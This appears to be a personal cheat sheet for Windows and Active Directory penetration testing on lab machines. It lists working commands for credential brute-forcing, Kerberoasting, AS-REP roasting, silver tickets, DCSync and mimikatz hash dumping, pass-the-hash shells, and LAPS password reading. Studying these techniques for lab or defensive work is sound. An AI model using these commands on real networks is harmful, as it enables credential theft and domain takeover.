Windows / AD Enumeration

This shows various checks that need to be performed while solving a machine.

-------------- WINDOWS ENUMERATION ---------------

SMB enumeration (139/445)

If SMB is on then check for shares first with all the tools -> smbmap, smbclient, enum4linux, etc.

If files are huge, then we can use "smbget" command to download them directly. (Check notion)

DNS enumeration (53)

Try finding subdomains or other domain names.

RPC Enumeration (Port 139, 593)

rpcclient can be used in most cases for gathering information but if it is not working then we can use it like this also -

rpcclient <target-ip>
#Normal command to check anonymous access

rpcclient -U '' <target-ip>
#Providing empty user sometimes work!!

rpcclient -U ''%'' <target-ip>
#Empty user with empty passwords (Worked for me in Resourced PG)

Follow the checklist present at this location ->

https://www.hackingarticles.in/active-directory-enumeration-rpcclient/

#######ADD some more from HTB Forest

Running Processes list -

Using CMD

tasklist

Using PowerShell

Get-Process

Firewall Enumeration -

Firewall rules can either be enumerated with netsh functionality or Powershell also.

Using netsh to dump all the firewall rules -

netsh advfirewall firewall show rule name=all
#Not recommended as it generates a lot of output

Other links for netsh commands -

  1. Check other cheatsheets

  2. https://www.hackingarticles.in/windows-firewall-post-exploitation-with-netsh/

Using Powershell to enumerate Firewall rules -

powershell -c Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
#shows only rules that block outbound traffic (Remove "-Enabled True" if needed)
#Use -All to dump all the rules (generates a lot of output)

We can also check which ports it is blocking using this rule with this command -

powershell -c "Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName,@{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}},@{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}}, Enabled, Profile,Direction,Action"

Base64 encoding & decoding to extract file -

Using certutil in cmd -

certutil -encode <file-name> h.64
more .\h.64

Using powershell to encode input -

powershell -c [convert]::ToBase64String((cat <file-name> -Encoding byte))

Decoding base64 input into a file -

echo <base64-input> | base64 -d > output-file.txt

Replacing strings using PowerShell Set-Content cmdlet -

We can replace a part of string by using Set-Content method in PowerShell like this -

((cat C:\Users\script.ps1) -replace "Get-Volume","hello") | Set-Content -Path C:\Users\script.ps1

The first part replaces the "Get-Volume" string by "hello" and the "Set-Content" part will make it permanent.

Using mimikatz to dump local passwords & user hashes

http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/

------------- AD ENUMERATION / EXPLOITATION------------

Enumerating all users & groups -

After getting access to the shell of one of the user, enumerate all the users & the groups they belong to using one of these -

  1. net.exe

  2. Powerview.ps1

  3. Bloodhound

#Most of the machines will be depending upon this enumeration technique for the exploitation.

Looking for SSRF to get Foothold via Responder

If we have SSRF on the website running in the target or something else through which we can trigger a request to responder running in our machine, then we can easily get NTLMv2 hash of the target user. We can crack this hash with hashcat after to retrieve the password.

Explained in detail in Notion notes and taken from PG Heist machine.

Relaying NTLMv2 hashes to other machines

If we aren't able to crack NTLMv2 hashes, then we can relay them to other machines. If the user whose hash we have, is a local-admin on other machine, then we'll be able to get admin privileges on other machine.

Check Notion for more detail.

ldapsearch -> Enumerating LDAP (389, 636, 3268, 3269)

Bloodhound will work if this port is open.

To get base DN, use this command first -

ldapsearch -H ldap://10.10.10.161 -x -s base namingcontexts

Getting ldap enumeration from target machine using base Domain Name -

ldapsearch -H ldap://10.10.10.161 -x -b "DC=htb,DC=local"

Run queries alongwith the ldapsearch command -

ldapsearch -H ldap://10.10.10.161 -x -b "DC=htb,DC=local" '(objectClass=Person)'
#This gets all the values which have ObjectClass set to "Person"

To get all usernames with ObjectClass->Person -

ldapsearch -H ldap://10.10.10.161 -x -b "DC=htb,DC=local" '(objectClass=Person)' | grep -i sAMAccountName

Now, we can take these usernames and start brute-forcing their password using crackmapexec -

crackmapexec smb 10.10.10.161 -u <usernames> -p <passwords>

Parsing sensitive information using ldapsearch

If ldapsearch returns excess output, look for sensitive attributes for valid user or machine accounts.

->Save the whole output of ldapsearch into a file and try looking for strings like "Pwd" or "passwd" or "secrets", etc.

-> Atleast check all attributes of all users from ldapsearch output.

For example, in cascade HTB machine, we had "cascadeLegacyPwd" attribute set for most of the users - to their passwords.

Kerbrute (Brute-forcing usernames & passwords)

Using kerbrute, we may enumerate valid usernames from the active directory network.

We can use "userenum" flag of kerbrute for this ->

kerbrute userenum -d <domain> /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
#It is recommended to use shorter usernames list (from website or other source)

Now, through the usernames you received to --> getNPUsers.py for AS-REP Roasting.

smbclient.py - impacket (SMB share enumeration)

This is useful even when NTLM authentication is disabled and kerberos is enabled.

smbclient.py scrm.local/ksimpson:ksimpson@dc1.scrm.local -dc-ip 10.10.10.168
#Provide "-k" when AD is using kerberos authentication (NTLM is disabled)
#Provide dc hostname with "-k" flag ******

Use "help" command to access multiple options.

We can also use "smbclient" tool in kali like this ->

smbclient //10.10.10.182/Data -U <useranme> --password=<pass>

GetUserSPNs.py --> Kerberoasting

Can work with / without valid AD Credentials (w.r.t. scenario) ->

GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k -debug
#Works when NTLM authentication enabled

GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -request -outputfile tgsticket.txt
#Works when kerberos authentication enabled.

Or, if we have a potential SPN, then we directly check whether it is associated with a user or not (WITHOUT ANY VALID CREDENTIALS) ->

GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
#No credentials needed

#Store the ticket generated from above ticket in a file and use hashcat to crack it.

#Make note of SPN for which ticket was generated.

The ticket generated above can also be used to perform Silver Ticket Attack (using ticketer.py) or to attack that SPN for which we got the password.

Getting Domain SID value ->

  1. We can use ldapsearch for this (use any basic command listed above)

  2. If the above command doesn't work then we can use this impacket tool -

    getPac.py -targetUser administrator <domain>/<username>:<password>
#It needs valid credentials to run

ticketer.py --> Silver Ticket (TGS) Attack 

ticketer.py -nthash <NTLM-HASH> -domain-sid <sid-value> -domain <domain> -dc-ip <IP or dc-hostname> -spn MSSQLSvc/dc1.scrm.local:1433 administrator

#Generates a TGS for "administrator" user with NTLM hash of the service account** to which SPN was assigned
#This command is for MSSQLSvc account (change it for yours)

Now, stored the ticket generated in KRB5CCACHE environment variable ->

KRB5CCNAME=administrator.ccache klist
#klist can be used to list stored tickets in memory (for both Windows or Linux)
#change the "name of the ticket" as per your need

Now, try accessing the target service. For example, MSSQL Service can be accessed here as ->

KRB5CCNAME=administrator.ccache mssqlclient.py -k dc1.scrm.local
#"-k" because of Kerberos auth

GetNPUsers/Rubeus.exe (AS-REP Roasting -> Cracking hashes)

If user accounts have kerberos pre-authentication disabled then we can use this impacket script (GetNPUsers.py) to get password hashes of those users and then crack them offline -

*Doesn't need valid credentials but valid credentials increase possibility of attack*

impacket-GetNPUsers -dc-ip 10.10.10.161 htb.local/
#This commands gets users who have kerberos authentication disabled
#But, this only uses bunch of default users


impacket-GetNPUsers -dc-ip 10.10.10.161 htb.local/ -usersfile <usernames-file>
#Passing the potential usernames found during enumeration

Use this command to get TGT of one of the users from above output -

impacket-GetNPUsers -dc-ip 10.10.10.161 htb.local/ -request
#Get TGT using "-request"
#Use "-usersfile" to pass potential usernames

impacket-GetNPUsers -dc-ip 192.168.191.70 -request corp.com/jeff:HenchmanPutridBonbon11
#AS-REP Roasting with valid credentials

Change format of TGT to hashcat or john for cracking it -

./GetNPUsers.py -dc-ip 10.10.10.161 htb.local/ -request -format hashcat

Now, we can use the cracked password to login as that user directly using evil-winrm or psexec or winexe (if we have enough access).

The similar thing can be done with Rubeus.exe binary directly from Windows ->

.\Rubeus.exe asreproast /nowrap    #Run directly from Windows GUI or revshell

DCSync Attack - 2 ways -->

1. Secretsdump.py (Dumping creds) -

If we have enough privileges on the target machine or DC, then we can use secretsdump.py to dump secrets like passwords or hashes.

impacket-secretsdump -just-dc-user <target-user> <domain>/<user>:<passwd>@<DC-IP>
#Here we are grabbing hash of any target-user (mainly administrator) by contacting DC
#We are using DC because we have DC-Sync rights


secretsdump.py '<user>:<password>@<machine/target-ip>'
#Should fetch administrator & other hashes in "LM:NT" format
#Target doesn't need to be DC only, we can dump hashes if we are local admin there

Use psexec.py or wmiexec.py now, to perform pass the hash attack to get administrator shell access.

#PSexec gives -> NT Authority/System privileges

#WmiExec gives -> administrator privileges

2. Mimikatz - DCSync

.\mimikatz 'lsadump::dcsync /domain:<domain> /user:administrator' exit
#Run this command from user shell who has "Replication rights" (DCSync rights)

psexec.py / wmiexec.py / evil-winrm (Pass the Hash or passwd)

#psexec & wmiexec only work if we have write access to one of the shares.##

If we have a user hash, then we can use below tools to perform pass the hash attack to get shell access as the user whose hash we possess.

We can use rc4-hmac hash also for this purpose (it is same as NT HASH).

psexec.py provides us NT Authoriy/System privileges, if we use "administrator" use like this ->

psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff' -dc-ip 10.10.10.175 administrator@10.10.10.175
#Using LM:NT hash format, which we usually get from "secretdumps.py"

psexec.py ignite/administrator:pass123@192.168.1.105
#Using raw username & password for login

./PsExec64.exe -i \\FILES04 -u <domain>/<user> -p <pass> cmd
#Executing command directly from domain-joined machine (target Windows OS)
#FILES04 is one of the machine from target Network

wmiexec.py provides "admin" privileges with the "administrator" hash ->

wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff' -dc-ip 10.10.10.175 administrator@10.10.10.175
#Using LM:NT hash format, which we usually get from "secretdumps.py"

wmiexec.py ignite/administrator:pass123@192.168.1.105 dir
#Using raw username & password for login

evil-winrm can also be used to login with user's password or hash -> (Port 5985)

evil-winrm -i 10.10.10.175 -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff
#Using NTLM hash of the user

evil-winrm -i 10.10.10.175 -u administrator -p pass123
#Login with password of the user

CRACKMAPEXEC (Post Exploitation - Enumeration)

Brute-forcing username & password over multiple services -

crackmapexec smb 10.10.10.161 -u <usernames> -p <passwords>
#Brute-forcing over "smb"

crackmapexec winrm 10.10.10.161 -u <usernames> -p Pass123
#Brute-forcing over "winrm" - port 5985

Using username & password for enumeration -

crackmapexec smb 10.10.10.161 -u <usernames> -p <passwords>

Getting password policy -

crackmapexec smb 10.10.10.161 -u <usernames> -p <passwords> --pass-pol

Getting shares from the target -

crackmapexec smb 10.10.10.161 -u <usernames> -p <passwords> --shares

Executing commands -

crackmapexec smb 10.10.10.161 -u <usernames> -p <passwords> -x <command>

Getting all the shares using spider_plus module in crackmapexec ->

crackmapexec smb 10.10.10.161 -u <usernames> -p <passwords> -M spider_plus

Bloodhound.py (using valid credentials) -

bloodhound-python -c All -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -dc dc.intelligence.htb -ns 10.10.10.248
#This bloodhound ingestor is present at both -> APT & Github repository.
#If it throws -> "Crypto" module not found error, then ->
just replace "Crypto.Hash" with "Cryptodome.Hash" in ntlm.py file inside ldap3 package.

Run neo4j console & then bloodhound GUI and put all .json files in it for evaluation.

Bloodhound needs port 389 (LDAP) to be open.

Getting shell access with .pfx files using evil-winrm -

If we have valid .pfx files then we can extract public (crt) and private keys from it to login using evil-winrm. (This is like logging in with ssh keys without username in linux)

We might need to crack the password of .pfx file first which can be done using john -

pfx2john.py legacyy_dev_auth.pfx    #Save the hash generated in a file

john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx.hash
#Crack that hash using the above command

Now, using the cracked password we need to extract the keys out of it.

First, extract the private keys -

openssl pkcs12 -in <pfx-file> -nocerts -out extracted-file.key-enc
#Set a PEM passphrase while extracting the key

Now, we can decrypt this key too so that we don't have to remember the password -

openssl rsa -in extracted-file.key-enc -out <decrypted.key>
#Now, the decrypted key can be used directly without the passphrase

Extracting public key (crt) -

openssl pkcs12 -in <pfx-file> -clcerts -nokeys -out <extracted.crt>
#Public key extracted successfully

Now, we can simply use evil-winrm to login using these 2 keys like this -

evil-winrm -c <extracted.crt> -k <decrypted.key> -S -i <target-ip>

"SeBackupPrivilege" Privilege Escalation

We can run "whoami /priv" to check whether we have "SeBackupPrivilege" set. It can be used to drop administrator hashes, which then can be used to perform PTH attack.

If we have low privilege access to the domain controller & we have this privilege set, then it can exploited to get domain admin privileges.

Follow the below link for exploitation ->

https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/

Useful binaries for further exploitation

Check this repository which has pre-compiled binaries (.exe) for different purposes ->

https://github.com/expl0itabl3/Toolies

ReadLAPSPassword Exploitation

If the current user has ReadLAPSPassword privilege then it can be used to read the LAPS password of the target computer account.

To exploit this we can use crackmapexec in this way ->

crackmapexec ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps
#Default command

cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"
#Using computer filter

MSSQLclient.py Exploitation

We can use impacket-mssqlclient.py to login with valid mssql service creds into a machine with following command -

impacket-mssqlclient oscp.exam/sql_svc:Dolphin1@10.10.104.148 -windows-auth
PreviousWeb Exploitation Last ResortsNextWindows PrivEsc (Extra Tricks)

Last updated